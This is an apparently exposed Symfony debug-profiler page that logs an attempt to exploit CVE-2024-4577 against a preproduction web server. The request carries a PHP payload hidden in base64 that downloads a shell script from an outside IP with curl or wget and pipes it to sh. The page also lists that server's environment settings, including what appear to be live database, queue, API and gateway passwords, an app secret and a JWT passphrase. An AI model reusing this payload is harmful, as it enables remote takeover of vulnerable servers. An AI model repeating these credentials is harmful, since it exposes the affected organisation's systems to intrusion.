n/a
Request
GET Parameters
| Key | Value |
|---|---|
| �d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
| Key | Value |
|---|---|
| <?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA | "")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _links | Symfony\Component\WebLink\GenericLinkProvider {#2088 -links: [ 2089 => Symfony\Component\WebLink\Link {#2089 -href: "https://163.172.54.100/api/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation" ] -attributes: [] } ] } |
| _remove_csp_headers | true |
| _stopwatch_token | "99af65" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| basic-auth-password | "V5z51j*EyVNA" |
| basic-auth-username | "milkiya_public" |
| connection | "keep-alive" |
| content-length | "221" |
| content-type | "application/x-www-form-urlencoded" |
| host | "163.172.54.100:443" |
| upgrade-insecure-requests | "1" |
| user-agent | "Custom-AsyncHttpClient" |
| x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzY2LjYzLjE4Ny4xOTMvc2ggfHwgd2dldCBodHRwOi8vNjYuNjMuMTg3LjE5My9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sun, 03 Aug 2025 00:49:05 GMT" |
| link | "<https://163.172.54.100/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation"" |
| vary | "Accept" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F163.172.54.100%2Fhello.world%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2FvhostsPreprod%2Fweb.milkiya.ma%2Freleases%2F20250108133004Z%2Fbackend%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "e03dd4" |
| x-debug-token-link | "https://163.172.54.100/_profiler/eb21e8" |
| x-previous-debug-token | "eb21e8" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| API_BASE_URL | "preprod-api.milkiya.ma" |
| API_PASSWORD | "6oo343GEOwi4Z" |
| API_SCHEME | "https" |
| API_USERNAME | "lretest@milkiya.ma" |
| APP_ENV | "dev" |
| APP_SECRET | "8188730c8f9fc4634926f07b5e94d899" |
| ASSET_VERSION | "v2" |
| CC_MANAGER_EMAIL | "gestion@milkiya.ma" |
| CC_MANDATE_EMAIL | "mandats@milkiya.ma" |
| CORS_ALLOW_ORIGIN | "^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$" |
| DATABASE_URL | "postgresql://user_preprod_milkiya_intranet:_764@Hiit@hiitco-postgresql-vip:5432/preprod_db_property_management?serverVersion=13&charset=utf8" |
| EXTERNAL_API_BASE_URL | "https://test.lre.ma/api" |
| GATEWAY_AUTH | "milkiya_gateway" |
| GATEWAY_PWD | "#Xv-7a@lKQPcx$1_W" |
| HTTP_BASIC_AUTH_PASSWORD | "V5z51j*EyVNA" |
| HTTP_BASIC_AUTH_USERNAME | "milkiya_public" |
| JWT_PASSPHRASE | "1e7da0ca4642ab63f799b4fd4a15a9c1" |
| JWT_PUBLIC_KEY | "%kernel.project_dir%/config/jwt/public.pem" |
| JWT_SECRET_KEY | "%kernel.project_dir%/config/jwt/private.pem" |
| JWT_TTL | "14400" |
| MAILER_DSN | "smtp://mailtrap:HiitCo2021@localhost:1025?encryption=&auth_mode=" |
| MESSENGER_TRANSPORT_DSN | "amqp://admin:8!dskZ624rEB@hiitco-rmq-preprod" |
| MILKIYA_TWIG_URL | "https://preprod-app.milkiya.ma/" |
| NG_PROPERTY_MANAGEMENT_URL | "http://intranet.milkiya.localhost/angular/" |
| SUBSCRIPTION_BASE_URL | "http://localhost:8001" |
| WKHTMLTOIMAGE_PATH | "/usr/local/bin/wkhtmltoimage" |
| WKHTMLTOPDF_PATH | "/usr/local/bin/wkhtmltopdf" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "221" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| DOCUMENT_ROOT | "/var/www/vhostsPreprod/web.milkiya.ma/releases/20250108133004Z/backend/public" |
| DOCUMENT_URI | "/index.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_CONTENT_LENGTH | "221" |
| HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
| HTTP_HOST | "163.172.54.100:443" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
| PATH_INFO | "" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "47.238.151.234" |
| REMOTE_PORT | "55172" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1754182145 |
| REQUEST_TIME_FLOAT | 1754182145.2038 |
| REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| SCRIPT_FILENAME | "/var/www/vhostsPreprod/web.milkiya.ma/releases/20250108133004Z/backend/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "163.172.54.100" |
| SERVER_NAME | "preprod-api.milkiya.ma" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.14.2" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,CORS_ALLOW_ORIGIN,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE,JWT_TTL,MAILER_DSN,MESSENGER_TRANSPORT_DSN,MILKIYA_TWIG_URL,NG_PROPERTY_MANAGEMENT_URL,API_BASE_URL,API_SCHEME,ASSET_VERSION,CC_MANDATE_EMAIL,CC_MANAGER_EMAIL,HTTP_BASIC_AUTH_USERNAME,HTTP_BASIC_AUTH_PASSWORD,WKHTMLTOPDF_PATH,WKHTMLTOIMAGE_PATH,GATEWAY_AUTH,GATEWAY_PWD,SUBSCRIPTION_BASE_URL,EXTERNAL_API_BASE_URL,API_USERNAME,API_PASSWORD" |
| USER | "www-data" |